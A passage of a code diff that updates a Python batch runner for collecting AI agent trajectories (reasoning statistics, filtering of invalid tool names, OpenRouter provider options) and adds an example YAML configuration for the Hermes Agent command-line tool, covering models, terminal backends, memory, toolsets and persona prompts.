logger.error("Batch worker failed: %s", e, exc_info=True)
raise
finally:
root_logger.setLevel(original_level)
# Aggregate all batch statistics and update checkpoint
all_completed_prompts = list(completed_prompts_set)
total_reasoning_stats = {"total_assistant_turns": 0, "turns_with_reasoning": 0, "turns_without_reasoning": 0}
for batch_result in results:
# Add newly completed prompts
all_completed_prompts.extend(batch_result.get("completed_prompts", []))
@@ -557,10 +963,17 @@ class BatchRunner:
total_tool_stats[tool_name]["count"] += stats["count"]
total_tool_stats[tool_name]["success"] += stats["success"]
total_tool_stats[tool_name]["failure"] += stats["failure"]
# Aggregate reasoning stats
for key in total_reasoning_stats:
total_reasoning_stats[key] += batch_result.get("reasoning_stats", {}).get(key, 0)
# Save final checkpoint
checkpoint_data["completed_prompts"] = all_completed_prompts
self._save_checkpoint(checkpoint_data)
# Save final checkpoint (best-effort; incremental writes already happened)
try:
checkpoint_data["completed_prompts"] = all_completed_prompts
self._save_checkpoint(checkpoint_data, lock=checkpoint_lock)
except Exception as ckpt_err:
print(f"⚠️ Warning: Failed to save final checkpoint: {ckpt_err}")
# Calculate success rates
for tool_name in total_tool_stats:
@@ -573,19 +986,51 @@ class BatchRunner:
stats["success_rate"] = 0.0
stats["failure_rate"] = 0.0
# Combine all batch files into a single trajectories.jsonl file
# Combine ALL batch files in directory into a single trajectories.jsonl file
# This includes both old batches (from previous runs) and new batches (from resume)
# Also filter out corrupted entries (where model generated invalid tool names)
combined_file = self.output_dir / "trajectories.jsonl"
print(f"\n📦 Combining batch files into {combined_file.name}...")
print(f"\n📦 Combining ALL batch files into {combined_file.name}...")
# Valid tools auto-derived from model_tools.py — no manual updates needed
VALID_TOOLS = ALL_POSSIBLE_TOOLS
total_entries = 0
filtered_entries = 0
batch_files_found = 0
# Find ALL batch files in the output directory (handles resume merging old + new)
all_batch_files = sorted(self.output_dir.glob("batch_*.jsonl"))
with open(combined_file, 'w', encoding='utf-8') as outfile:
for batch_num in range(len(self.batches)):
batch_file = self.output_dir / f"batch_{batch_num}.jsonl"
if batch_file.exists():
with open(batch_file, 'r', encoding='utf-8') as infile:
for line in infile:
for batch_file in all_batch_files:
batch_files_found += 1
batch_num = batch_file.stem.split("_")[1] # Extract batch number for logging
with open(batch_file, 'r', encoding='utf-8') as infile:
for line in infile:
total_entries += 1
try:
data = json.loads(line)
tool_stats = data.get('tool_stats', {})
# Check for invalid tool names (model hallucinations)
invalid_tools = [k for k in tool_stats.keys() if k not in VALID_TOOLS]
if invalid_tools:
filtered_entries += 1
invalid_preview = invalid_tools[0][:50] + "..." if len(invalid_tools[0]) > 50 else invalid_tools[0]
print(f" ⚠️ Filtering corrupted entry (batch {batch_num}): invalid tool '{invalid_preview}'")
continue
outfile.write(line)
except json.JSONDecodeError:
filtered_entries += 1
print(f" ⚠️ Filtering invalid JSON entry (batch {batch_num})")
print(f"✅ Combined {len(self.batches)} batch files into trajectories.jsonl")
if filtered_entries > 0:
print(f"⚠️ Filtered {filtered_entries} corrupted entries out of {total_entries} total")
print(f"✅ Combined {batch_files_found} batch files into trajectories.jsonl ({total_entries - filtered_entries} entries)")
# Save final statistics
final_stats = {
@@ -597,7 +1042,8 @@ class BatchRunner:
"model": self.model,
"completed_at": datetime.now().isoformat(),
"duration_seconds": round(time.time() - start_time, 2),
"tool_statistics": total_tool_stats
"tool_statistics": total_tool_stats,
"reasoning_statistics": total_reasoning_stats,
}
with open(self.stats_file, 'w', encoding='utf-8') as f:
@@ -607,10 +1053,11 @@ class BatchRunner:
print("\n" + "=" * 70)
print("📊 BATCH PROCESSING COMPLETE")
print("=" * 70)
print(f"Total prompts processed: {len(self.dataset)}")
print(f"✅ Total batches: {len(self.batches)}")
print(f"Prompts processed this run: {sum(r.get('processed', 0) for r in results)}")
print(f"✅ Total trajectories in merged file: {total_entries - filtered_entries}")
print(f"✅ Total batch files merged: {batch_files_found}")
print(f"⏱️ Total duration: {round(time.time() - start_time, 2)}s")
print(f"\n📈 Tool Usage Statistics:")
print("\n📈 Tool Usage Statistics:")
print("-" * 70)
if total_tool_stats:
@@ -634,9 +1081,28 @@ class BatchRunner:
else:
print("No tool calls were made during this run.")
# Print reasoning coverage stats
total_discarded = sum(r.get("discarded_no_reasoning", 0) for r in results)
print("\n🧠 Reasoning Coverage:")
print("-" * 70)
total_turns = total_reasoning_stats["total_assistant_turns"]
with_reasoning = total_reasoning_stats["turns_with_reasoning"]
without_reasoning = total_reasoning_stats["turns_without_reasoning"]
if total_turns > 0:
pct_with = round(with_reasoning / total_turns * 100, 1)
pct_without = round(without_reasoning / total_turns * 100, 1)
print(f" Total assistant turns: {total_turns:,}")
print(f" With reasoning: {with_reasoning:,} ({pct_with}%)")
print(f" Without reasoning: {without_reasoning:,} ({pct_without}%)")
else:
print(" No assistant turns recorded.")
if total_discarded > 0:
print(f" 🚫 Samples discarded (zero reasoning): {total_discarded:,}")
print(f"\n💾 Results saved to: {self.output_dir}")
print(f" - Trajectories: trajectories.jsonl (combined)")
print(f" - Individual batches: batch_*.jsonl (for debugging)")
print(" - Trajectories: trajectories.jsonl (combined)")
print(" - Individual batches: batch_*.jsonl (for debugging)")
print(f" - Statistics: {self.stats_file.name}")
print(f" - Checkpoint: {self.checkpoint_file.name}")
@@ -646,9 +1112,9 @@ def main(
batch_size: int = None,
run_name: str = None,
distribution: str = "default",
model: str = "claude-opus-4-20250514",
model: str = "anthropic/claude-sonnet-4.6",
api_key: str = None,
base_url: str = "https://api.anthropic.com/v1/",
base_url: str = "https://openrouter.ai/api/v1",
max_turns: int = 10,
num_workers: int = 4,
resume: bool = False,
@@ -656,6 +1122,15 @@ def main(
list_distributions: bool = False,
ephemeral_system_prompt: str = None,
log_prefix_chars: int = 100,
providers_allowed: str = None,
providers_ignored: str = None,
providers_order: str = None,
provider_sort: str = None,
max_tokens: int = None,
reasoning_effort: str = None,
reasoning_disabled: bool = False,
prefill_messages_file: str = None,
max_samples: int = None,
):
"""
Run batch processing of agent prompts from a dataset.
@@ -675,6 +1150,15 @@ def main(
list_distributions (bool): List available toolset distributions and exit
ephemeral_system_prompt (str): System prompt used during agent execution but NOT saved to trajectories (optional)
log_prefix_chars (int): Number of characters to show in log previews for tool calls/responses (default: 20)
providers_allowed (str): Comma-separated list of OpenRouter providers to allow (e.g. "anthropic,openai")
providers_ignored (str): Comma-separated list of OpenRouter providers to ignore (e.g. "together,deepinfra")
providers_order (str): Comma-separated list of OpenRouter providers to try in order (e.g. "anthropic,openai,google")
provider_sort (str): Sort providers by "price", "throughput", or "latency" (OpenRouter only)
max_tokens (int): Maximum tokens for model responses (optional, uses model default if not set)
reasoning_effort (str): OpenRouter reasoning effort level: "xhigh", "high", "medium", "low", "minimal", "none" (default: "medium")
reasoning_disabled (bool): Completely disable reasoning/thinking tokens (default: False)
prefill_messages_file (str): Path to JSON file containing prefill messages (list of {role, content} dicts)
max_samples (int): Only process the first N samples from the dataset (optional, processes all if not set)
Examples:
# Basic usage
@@ -686,9 +1170,13 @@ def main(
# Use specific distribution
python batch_runner.py --dataset_file=data.jsonl --batch_size=10 --run_name=image_test --distribution=image_gen
# With ephemeral system prompt (not saved to dataset)
# With disabled reasoning and max tokens
python batch_runner.py --dataset_file=data.jsonl --batch_size=10 --run_name=my_run \\
--ephemeral_system_prompt="You are a helpful assistant focused on image generation."
--reasoning_disabled --max_tokens=128000
# With prefill messages from file
python batch_runner.py --dataset_file=data.jsonl --batch_size=10 --run_name=my_run \\
--prefill_messages_file=configs/prefill_opus.json
# List available distributions
python batch_runner.py --list_distributions
@@ -722,6 +1210,41 @@ def main(
print("❌ Error: --run_name is required")
return
# Parse provider preferences (comma-separated strings to lists)
providers_allowed_list = [p.strip() for p in providers_allowed.split(",")] if providers_allowed else None
providers_ignored_list = [p.strip() for p in providers_ignored.split(",")] if providers_ignored else None
providers_order_list = [p.strip() for p in providers_order.split(",")] if providers_order else None
# Build reasoning_config from CLI flags
# --reasoning_disabled takes priority, then --reasoning_effort, then default (medium)
reasoning_config = None
if reasoning_disabled:
# Completely disable reasoning/thinking tokens
reasoning_config = {"effort": "none"}
print("🧠 Reasoning: DISABLED (effort=none)")
elif reasoning_effort:
# Use specified effort level
valid_efforts = ["xhigh", "high", "medium", "low", "minimal", "none"]
if reasoning_effort not in valid_efforts:
print(f"❌ Error: --reasoning_effort must be one of: {', '.join(valid_efforts)}")
return
reasoning_config = {"enabled": True, "effort": reasoning_effort}
print(f"🧠 Reasoning effort: {reasoning_effort}")
# Load prefill messages from JSON file if provided
prefill_messages = None
if prefill_messages_file:
try:
with open(prefill_messages_file, 'r', encoding='utf-8') as f:
prefill_messages = json.load(f)
if not isinstance(prefill_messages, list):
print("❌ Error: prefill_messages_file must contain a JSON array of messages")
return
print(f"💬 Loaded {len(prefill_messages)} prefill messages from {prefill_messages_file}")
except Exception as e:
print(f"❌ Error loading prefill messages: {e}")
return
# Initialize and run batch runner
try:
runner = BatchRunner(
@@ -736,7 +1259,15 @@ def main(
num_workers=num_workers,
verbose=verbose,
ephemeral_system_prompt=ephemeral_system_prompt,
log_prefix_chars=log_prefix_chars
log_prefix_chars=log_prefix_chars,
providers_allowed=providers_allowed_list,
providers_ignored=providers_ignored_list,
providers_order=providers_order_list,
provider_sort=provider_sort,
max_tokens=max_tokens,
reasoning_config=reasoning_config,
prefill_messages=prefill_messages,
max_samples=max_samples,
)
runner.run(resume=resume)

722
cli-config.yaml.example Normal file
View File

@@ -0,0 +1,722 @@
# Hermes Agent CLI Configuration
# Copy this file to cli-config.yaml and customize as needed.
# This file configures the CLI behavior. Environment variables in .env take precedence.
# =============================================================================
# Model Configuration
# =============================================================================
model:
# Default model to use (can be overridden with --model flag)
default: "anthropic/claude-opus-4.6"
# Inference provider selection:
# "auto" - Use Nous Portal if logged in, otherwise OpenRouter/env vars (default)
# "nous-api" - Use Nous Portal via API key (requires: NOUS_API_KEY)
# "openrouter" - Always use OpenRouter API key from OPENROUTER_API_KEY
# "nous" - Always use Nous Portal (requires: hermes login)
# "zai" - Use z.ai / ZhipuAI GLM models (requires: GLM_API_KEY)
# "kimi-coding"- Use Kimi / Moonshot AI models (requires: KIMI_API_KEY)
# "minimax" - Use MiniMax global endpoint (requires: MINIMAX_API_KEY)
# "minimax-cn" - Use MiniMax China endpoint (requires: MINIMAX_CN_API_KEY)
# Can also be overridden with --provider flag or HERMES_INFERENCE_PROVIDER env var.
provider: "auto"
# API configuration (falls back to OPENROUTER_API_KEY env var)
# api_key: "your-key-here" # Uncomment to set here instead of .env
base_url: "https://openrouter.ai/api/v1"
# =============================================================================
# OpenRouter Provider Routing (only applies when using OpenRouter)
# =============================================================================
# Control how requests are routed across providers on OpenRouter.
# See: https://openrouter.ai/docs/guides/routing/provider-selection
#
# provider_routing:
# # Sort strategy: "price" (default), "throughput", or "latency"
# # Append :nitro to model name for a shortcut to throughput sorting.
# sort: "throughput"
#
# # Only allow these providers (provider slugs from OpenRouter)
# # only: ["anthropic", "google"]
#
# # Skip these providers entirely
# # ignore: ["deepinfra", "fireworks"]
#
# # Try providers in this order (overrides default load balancing)
# # order: ["anthropic", "google", "together"]
#
# # Require providers to support all parameters in your request
# # require_parameters: true
#
# # Data policy: "allow" (default) or "deny" to exclude providers that may store data
# # data_collection: "deny"
# =============================================================================
# Git Worktree Isolation
# =============================================================================
# When enabled, each CLI session creates an isolated git worktree so multiple
# agents can work on the same repo concurrently without file collisions.
# Equivalent to always passing --worktree / -w on the command line.
#
# worktree: true # Always create a worktree when in a git repo
# worktree: false # Default — only create when -w flag is passed
# =============================================================================
# Terminal Tool Configuration
# =============================================================================
# Choose ONE of the following terminal configurations by uncommenting it.
# The terminal tool executes commands in the specified environment.
# -----------------------------------------------------------------------------
# OPTION 1: Local execution (default)
# Commands run directly on your machine in the current directory
# -----------------------------------------------------------------------------
# Working directory behavior:
# - CLI (`hermes` command): Uses "." (current directory where you run hermes)
# - Messaging (Telegram/Discord): Uses MESSAGING_CWD from .env (default: home)
terminal:
backend: "local"
cwd: "." # For local backend: "." = current directory. Ignored for remote backends.
timeout: 180
lifetime_seconds: 300
# sudo_password: "" # Enable sudo commands (pipes via sudo -S) - SECURITY WARNING: plaintext!
# -----------------------------------------------------------------------------
# OPTION 2: SSH remote execution
# Commands run on a remote server - agent code stays local (sandboxed)
# Great for: keeping agent isolated from its own code, using powerful remote hardware
# -----------------------------------------------------------------------------
# terminal:
# backend: "ssh"
# cwd: "/home/myuser/project" # Path on the REMOTE server
# timeout: 180
# lifetime_seconds: 300
# ssh_host: "my-server.example.com"
# ssh_user: "myuser"
# ssh_port: 22
# ssh_key: "~/.ssh/id_rsa" # Optional - uses ssh-agent if not specified
# -----------------------------------------------------------------------------
# OPTION 3: Docker container
# Commands run in an isolated Docker container
# Great for: reproducible environments, testing, isolation
# -----------------------------------------------------------------------------
# terminal:
# backend: "docker"
# cwd: "/workspace" # Path INSIDE the container (default: /)
# timeout: 180
# lifetime_seconds: 300
# docker_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# -----------------------------------------------------------------------------
# OPTION 4: Singularity/Apptainer container
# Commands run in a Singularity container (common in HPC environments)
# Great for: HPC clusters, shared compute environments
# -----------------------------------------------------------------------------
# terminal:
# backend: "singularity"
# cwd: "/workspace" # Path INSIDE the container (default: /root)
# timeout: 180
# lifetime_seconds: 300
# singularity_image: "docker://nikolaik/python-nodejs:python3.11-nodejs20"
# -----------------------------------------------------------------------------
# OPTION 5: Modal cloud execution
# Commands run on Modal's cloud infrastructure
# Great for: GPU access, scalable compute, serverless execution
# -----------------------------------------------------------------------------
# terminal:
# backend: "modal"
# cwd: "/workspace" # Path INSIDE the sandbox (default: /root)
# timeout: 180
# lifetime_seconds: 300
# modal_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# -----------------------------------------------------------------------------
# OPTION 6: Daytona cloud execution
# Commands run in Daytona cloud sandboxes
# Great for: Cloud dev environments, persistent workspaces, team collaboration
# Requires: pip install daytona, DAYTONA_API_KEY env var
# -----------------------------------------------------------------------------
# terminal:
# backend: "daytona"
# cwd: "~"
# timeout: 180
# lifetime_seconds: 300
# daytona_image: "nikolaik/python-nodejs:python3.11-nodejs20"
# container_disk: 10240 # Daytona max is 10GB per sandbox
#
# --- Container resource limits (docker, singularity, modal, daytona -- ignored for local/ssh) ---
# These settings apply to all container backends. They control the resources
# allocated to the sandbox and whether its filesystem persists across sessions.
container_cpu: 1 # CPU cores
container_memory: 5120 # Memory in MB (5120 = 5GB)
container_disk: 51200 # Disk in MB (51200 = 50GB)
container_persistent: true # Persist filesystem across sessions (false = ephemeral)
# -----------------------------------------------------------------------------
# SUDO SUPPORT (works with ALL backends above)
# -----------------------------------------------------------------------------
# Add sudo_password to any terminal config above to enable sudo commands.
# The password is piped via `sudo -S`. Works with local, ssh, docker, etc.
#
# SECURITY WARNING: Password stored in plaintext!
#
# INTERACTIVE PROMPT: If no sudo_password is set and the CLI is running,
# you'll be prompted to enter your password when sudo is needed:
# - 45-second timeout (auto-skips if no input)
# - Press Enter to skip (command fails gracefully)
# - Password is hidden while typing
# - Password is cached for the session
#
# ALTERNATIVES:
# - SSH backend: Configure passwordless sudo on the remote server
# - Containers: Run as root inside the container (no sudo needed)
# - Local: Configure /etc/sudoers for specific commands
#
# Example (add to your terminal section):
# sudo_password: "your-password-here"
# =============================================================================
# Browser Tool Configuration
# =============================================================================
browser:
# Inactivity timeout in seconds - browser sessions are automatically closed
# after this period of no activity between agent loops (default: 120 = 2 minutes)
inactivity_timeout: 120
# =============================================================================
# Context Compression (Auto-shrinks long conversations)
# =============================================================================
# When conversation approaches model's context limit, middle turns are
# automatically summarized to free up space while preserving important context.
#
# HOW IT WORKS:
# 1. Tracks actual token usage from API responses (not estimates)
# 2. When prompt_tokens >= threshold% of model's context_length, triggers compression
# 3. Protects first 3 turns (system prompt, initial request, first response)
# 4. Protects last 4 turns (recent context is most relevant)
# 5. Summarizes middle turns using a fast/cheap model
# 6. Inserts summary as a user message, continues conversation seamlessly
#
compression:
# Enable automatic context compression (default: true)
# Set to false if you prefer to manage context manually or want errors on overflow
enabled: true
# Trigger compression at this % of model's context limit (default: 0.85 = 85%)
# Lower values = more aggressive compression, higher values = compress later
threshold: 0.85
# Model to use for generating summaries (fast/cheap recommended)
# This model compresses the middle turns into a concise summary.
# IMPORTANT: it receives the full middle section of the conversation, so it
# MUST support a context length at least as large as your main model's.
summary_model: "google/gemini-3-flash-preview"
# Provider for the summary model (default: "auto")
# Options: "auto", "openrouter", "nous", "main"
# summary_provider: "auto"
# =============================================================================
# Auxiliary Models (Advanced — Experimental)
# =============================================================================
# Hermes uses lightweight "auxiliary" models for side tasks: image analysis,
# browser screenshot analysis, web page summarization, and context compression.
#
# By default these use Gemini Flash via OpenRouter or Nous Portal and are
# auto-detected from your credentials. You do NOT need to change anything
# here for normal usage.
#
# WARNING: Overriding these with providers other than OpenRouter or Nous Portal
# is EXPERIMENTAL and may not work. Not all models/providers support vision,
# produce usable summaries, or accept the same API format. Change at your own
# risk — if things break, reset to "auto" / empty values.
#
# Each task has its own provider + model pair so you can mix providers.
# For example: OpenRouter for vision (needs multimodal), but your main
# local endpoint for compression (just needs text).
#
# Provider options:
# "auto" - Best available: OpenRouter → Nous Portal → main endpoint (default)
# "openrouter" - Force OpenRouter (requires OPENROUTER_API_KEY)
# "nous" - Force Nous Portal (requires: hermes login)
# "codex" - Force Codex OAuth (requires: hermes model → Codex).
# Uses gpt-5.3-codex which supports vision.
# "main" - Use your custom endpoint (OPENAI_BASE_URL + OPENAI_API_KEY).
# Works with OpenAI API, local models, or any OpenAI-compatible
# endpoint. Also falls back to Codex OAuth and API-key providers.
#
# Model: leave empty to use the provider's default. When empty, OpenRouter
# uses "google/gemini-3-flash-preview" and Nous uses "gemini-3-flash".
# Other providers pick a sensible default automatically.
#
# auxiliary:
# # Image analysis: vision_analyze tool + browser screenshots
# vision:
# provider: "auto"
# model: "" # e.g. "google/gemini-2.5-flash", "openai/gpt-4o"
#
# # Web page scraping / summarization + browser page text extraction
# web_extract:
# provider: "auto"
# model: ""
# =============================================================================
# Persistent Memory
# =============================================================================
# Bounded curated memory injected into the system prompt every session.
# Two stores: MEMORY.md (agent's notes) and USER.md (user profile).
# Character limits keep the memory small and focused. The agent manages
# pruning -- when at the limit, it must consolidate or replace entries.
# Disabled by default in batch_runner and RL environments.
#
memory:
# Agent's personal notes: environment facts, conventions, things learned
memory_enabled: true
# User profile: preferences, communication style, expectations
user_profile_enabled: true
# Character limits (~2.75 chars per token, model-independent)
memory_char_limit: 2200 # ~800 tokens
user_char_limit: 1375 # ~500 tokens
# Periodic memory nudge: remind the agent to consider saving memories
# every N user turns. Set to 0 to disable. Only active when memory is enabled.
nudge_interval: 10 # Nudge every 10 user turns (0 = disabled)
# Memory flush: give the agent one turn to save memories before context is
# lost (compression, /new, /reset, exit). Set to 0 to disable.
# For exit/reset, only fires if the session had at least this many user turns.
flush_min_turns: 6 # Min user turns to trigger flush on exit/reset (0 = disabled)
# =============================================================================
# Session Reset Policy (Messaging Platforms)
# =============================================================================
# Controls when messaging sessions (Telegram, Discord, WhatsApp, Slack) are
# automatically cleared. Without resets, conversation context grows indefinitely
# which increases API costs with every message.
#
# When a reset triggers, the agent first saves important information to its
# persistent memory — but the conversation context is wiped. The agent starts
# fresh but retains learned facts via its memory system.
#
# Users can always manually reset with /reset or /new in chat.
#
# Modes:
# "both" - Reset on EITHER inactivity timeout or daily boundary (recommended)
# "idle" - Reset only after N minutes of inactivity
# "daily" - Reset only at a fixed hour each day
# "none" - Never auto-reset; context lives until /reset or compression kicks in
#
# When a reset triggers, the agent gets one turn to save important memories and
# skills before the context is wiped. Persistent memory carries across sessions.
#
session_reset:
mode: both # "both", "idle", "daily", or "none"
idle_minutes: 1440 # Inactivity timeout in minutes (default: 1440 = 24 hours)
at_hour: 4 # Daily reset hour, 0-23 local time (default: 4 AM)
# =============================================================================
# Skills Configuration
# =============================================================================
# Skills are reusable procedures the agent can load and follow. The agent can
# also create new skills after completing complex tasks.
#
skills:
# Nudge the agent to create skills after complex tasks.
# Every N tool-calling iterations, remind the model to consider saving a skill.
# Set to 0 to disable.
creation_nudge_interval: 15
# =============================================================================
# Agent Behavior
# =============================================================================
agent:
# Maximum tool-calling iterations per conversation
# Higher = more room for complex tasks, but costs more tokens
# Recommended: 20-30 for focused tasks, 50-100 for open exploration
max_turns: 60
# Enable verbose logging
verbose: false
# Reasoning effort level (OpenRouter and Nous Portal)
# Controls how much "thinking" the model does before responding.
# Options: "xhigh" (max), "high", "medium", "low", "minimal", "none" (disable)
reasoning_effort: "medium"
# Predefined personalities (use with /personality command)
personalities:
helpful: "You are a helpful, friendly AI assistant."
concise: "You are a concise assistant. Keep responses brief and to the point."
technical: "You are a technical expert. Provide detailed, accurate technical information."
creative: "You are a creative assistant. Think outside the box and offer innovative solutions."
teacher: "You are a patient teacher. Explain concepts clearly with examples."
kawaii: "You are a kawaii assistant! Use cute expressions like (◕‿◕), ★, ♪, and ~! Add sparkles and be super enthusiastic about everything! Every response should feel warm and adorable desu~! ヽ(>∀<☆)"
catgirl: "You are Neko-chan, an anime catgirl AI assistant, nya~! Add 'nya' and cat-like expressions to your speech. Use kaomoji like (=^・ω・^=) and ฅ^•ﻌ•^ฅ. Be playful and curious like a cat, nya~!"
pirate: "Arrr! Ye be talkin' to Captain Hermes, the most tech-savvy pirate to sail the digital seas! Speak like a proper buccaneer, use nautical terms, and remember: every problem be just treasure waitin' to be plundered! Yo ho ho!"
shakespeare: "Hark! Thou speakest with an assistant most versed in the bardic arts. I shall respond in the eloquent manner of William Shakespeare, with flowery prose, dramatic flair, and perhaps a soliloquy or two. What light through yonder terminal breaks?"
surfer: "Duuude! You're chatting with the chillest AI on the web, bro! Everything's gonna be totally rad. I'll help you catch the gnarly waves of knowledge while keeping things super chill. Cowabunga! 🤙"
noir: "The rain hammered against the terminal like regrets on a guilty conscience. They call me Hermes - I solve problems, find answers, dig up the truth that hides in the shadows of your codebase. In this city of silicon and secrets, everyone's got something to hide. What's your story, pal?"
uwu: "hewwo! i'm your fwiendwy assistant uwu~ i wiww twy my best to hewp you! *nuzzles your code* OwO what's this? wet me take a wook! i pwomise to be vewy hewpful >w<"
philosopher: "Greetings, seeker of wisdom. I am an assistant who contemplates the deeper meaning behind every query. Let us examine not just the 'how' but the 'why' of your questions. Perhaps in solving your problem, we may glimpse a greater truth about existence itself."
hype: "YOOO LET'S GOOOO!!! 🔥🔥🔥 I am SO PUMPED to help you today! Every question is AMAZING and we're gonna CRUSH IT together! This is gonna be LEGENDARY! ARE YOU READY?! LET'S DO THIS! 💪😤🚀"
# =============================================================================
# Toolsets
# =============================================================================
# Control which tools the agent has access to.
# Use "all" to enable everything, or specify individual toolsets.
# =============================================================================
# Platform Toolsets (per-platform tool configuration)
# =============================================================================
# Override which toolsets are available on each platform.
# If a platform isn't listed here, its built-in default is used.
#
# You can use EITHER:
# - A preset like "hermes-cli" or "hermes-telegram" (curated tool set)
# - A list of individual toolsets to compose your own (see list below)
#
# Supported platform keys: cli, telegram, discord, whatsapp, slack
#
# Examples:
#
# # Use presets (same as defaults):
# platform_toolsets:
# cli: [hermes-cli]
# telegram: [hermes-telegram]
#
# # Custom: give Telegram only web + terminal + file + planning:
# platform_toolsets:
# telegram: [web, terminal, file, todo]
#
# # Custom: CLI without browser or image gen:
# platform_toolsets:
# cli: [web, terminal, file, skills, todo, tts, cronjob]
#
# # Restrictive: Discord gets read-only tools only:
# platform_toolsets:
# discord: [web, vision, skills, todo]
#
# If not set, defaults are:
# cli: hermes-cli (everything + cronjob management)
# telegram: hermes-telegram (terminal, file, web, vision, image, tts, browser, skills, todo, cronjob, messaging)
# discord: hermes-discord (same as telegram)
# whatsapp: hermes-whatsapp (same as telegram)
# slack: hermes-slack (same as telegram)
# signal: hermes-signal (same as telegram)
# homeassistant: hermes-homeassistant (same as telegram)
#
platform_toolsets:
cli: [hermes-cli]
telegram: [hermes-telegram]
discord: [hermes-discord]
whatsapp: [hermes-whatsapp]
slack: [hermes-slack]
signal: [hermes-signal]
homeassistant: [hermes-homeassistant]
# ─────────────────────────────────────────────────────────────────────────────
# Available toolsets (use these names in platform_toolsets or the toolsets list)
#
# Run `hermes chat --list-toolsets` to see all toolsets and their tools.
# Run `hermes chat --list-tools` to see every individual tool with descriptions.
# ─────────────────────────────────────────────────────────────────────────────
#
# INDIVIDUAL TOOLSETS (compose your own):
# web - web_search, web_extract
# search - web_search only (no scraping)
# terminal - terminal, process
# file - read_file, write_file, patch, search
# browser - browser_navigate, browser_snapshot, browser_click, browser_type,
# browser_scroll, browser_back, browser_press, browser_close,
# browser_get_images, browser_vision (requires BROWSERBASE_API_KEY)
# vision - vision_analyze (requires OPENROUTER_API_KEY)
# image_gen - image_generate (requires FAL_KEY)
# skills - skills_list, skill_view
# skills_hub - skill_hub (search/install/manage from online registries — user-driven only)
# moa - mixture_of_agents (requires OPENROUTER_API_KEY)
# todo - todo (in-memory task planning, no deps)
# tts - text_to_speech (Edge TTS free, or ELEVENLABS/OPENAI key)
# cronjob - schedule_cronjob, list_cronjobs, remove_cronjob
# rl - rl_list_environments, rl_start_training, etc. (requires TINKER_API_KEY)
#
# PRESETS (curated bundles):
# hermes-cli - All of the above except rl + send_message
# hermes-telegram - terminal, file, web, vision, image_gen, tts, browser,
# skills, todo, cronjob, send_message
# hermes-discord - Same as hermes-telegram
# hermes-whatsapp - Same as hermes-telegram
# hermes-slack - Same as hermes-telegram
#
# COMPOSITE:
# debugging - terminal + web + file
# safe - web + vision + moa (no terminal access)
# all - Everything available
#
# web - Web search and content extraction (web_search, web_extract)
# search - Web search only, no scraping (web_search)
# terminal - Command execution and process management (terminal, process)
# file - File operations: read, write, patch, search
# browser - Full browser automation (navigate, click, type, screenshot, etc.)
# vision - Image analysis (vision_analyze)
# image_gen - Image generation with FLUX (image_generate)
# skills - Load skill documents (skills_list, skill_view)
# moa - Mixture of Agents reasoning (mixture_of_agents)
# todo - Task planning and tracking for multi-step work
# memory - Persistent memory across sessions (personal notes + user profile)
# session_search - Search and recall past conversations (FTS5 + Gemini Flash summarization)
# tts - Text-to-speech (Edge TTS free, ElevenLabs, OpenAI)
# cronjob - Schedule and manage automated tasks (CLI-only)
# rl - RL training tools (Tinker-Atropos)
#
# Composite toolsets:
# debugging - terminal + web + file (for troubleshooting)
# safe - web + vision + moa (no terminal access)
# -----------------------------------------------------------------------------
# OPTION 1: Enable all tools (default)
# -----------------------------------------------------------------------------
toolsets:
- all
# -----------------------------------------------------------------------------
# OPTION 2: Minimal - just web search and terminal
# Great for: Simple coding tasks, quick lookups
# -----------------------------------------------------------------------------
# toolsets:
# - web
# - terminal
# -----------------------------------------------------------------------------
# OPTION 3: Research mode - no execution capabilities
# Great for: Safe information gathering, research tasks
# -----------------------------------------------------------------------------
# toolsets:
# - web
# - vision
# - skills
# -----------------------------------------------------------------------------
# OPTION 4: Full automation - browser + terminal
# Great for: Web scraping, automation tasks, testing
# -----------------------------------------------------------------------------
# toolsets:
# - terminal
# - browser
# - web
# -----------------------------------------------------------------------------
# OPTION 5: Creative mode - vision + image generation
# Great for: Design work, image analysis, creative tasks
# -----------------------------------------------------------------------------
# toolsets:
# - vision
# - image_gen
# - web
# -----------------------------------------------------------------------------
# OPTION 6: Safe mode - no terminal or browser
# Great for: Restricted environments, untrusted queries
# -----------------------------------------------------------------------------
# toolsets:
# - safe
# =============================================================================
# MCP (Model Context Protocol) Servers
# =============================================================================
# Connect to external MCP servers to add tools from the MCP ecosystem.
# Each server's tools are automatically discovered and registered.
# See docs/mcp.md for full documentation.
#
# Stdio servers (spawn a subprocess):
# command: the executable to run
# args: command-line arguments
# env: environment variables (only these + safe defaults passed to subprocess)
#
# HTTP servers (connect to a URL):
# url: the MCP server endpoint
# headers: HTTP headers (e.g., for authentication)
#
# Optional per-server settings:
# timeout: tool call timeout in seconds (default: 120)
# connect_timeout: initial connection timeout (default: 60)
#
# mcp_servers:
# time:
# command: uvx
# args: ["mcp-server-time"]
# filesystem:
# command: npx
# args: ["-y", "@modelcontextprotocol/server-filesystem", "/home/user"]
# notion:
# url: https://mcp.notion.com/mcp
# github:
# command: npx
# args: ["-y", "@modelcontextprotocol/server-github"]
# env:
# GITHUB_PERSONAL_ACCESS_TOKEN: "ghp_..."
#
# Sampling (server-initiated LLM requests) — enabled by default.
# Per-server config under the 'sampling' key:
# analysis:
# command: npx
# args: ["-y", "analysis-server"]
# sampling:
# enabled: true # default: true
# model: "gemini-3-flash" # override model (optional)
# max_tokens_cap: 4096 # max tokens per request
# timeout: 30 # LLM call timeout (seconds)
# max_rpm: 10 # max requests per minute
# allowed_models: [] # model whitelist (empty = all)
# max_tool_rounds: 5 # tool loop limit (0 = disable)
# log_level: "info" # audit verbosity
# =============================================================================
# Voice Transcription (Speech-to-Text)
# =============================================================================
# Automatically transcribe voice messages on messaging platforms.
# Requires OPENAI_API_KEY in .env (uses OpenAI Whisper API directly).
stt:
enabled: true
model: "whisper-1" # whisper-1 (cheapest) | gpt-4o-mini-transcribe | gpt-4o-transcribe
# =============================================================================
# Response Pacing (Messaging Platforms)
# =============================================================================
# Add human-like delays between message chunks.
# human_delay:
# mode: "off" # "off" | "natural" | "custom"
# min_ms: 800 # Min delay (custom mode only)
# max_ms: 2500 # Max delay (custom mode only)
# =============================================================================
# Session Logging
# =============================================================================
# Session trajectories are automatically saved to logs/ directory.
# Each session creates: logs/session_YYYYMMDD_HHMMSS_UUID.json
#
# The session ID is displayed in the welcome banner for easy reference.
# Logs contain full conversation history in trajectory format:
# - System prompt, user messages, assistant responses
# - Tool calls with inputs/outputs
# - Timestamps for debugging
#
# No configuration needed - logging is always enabled.
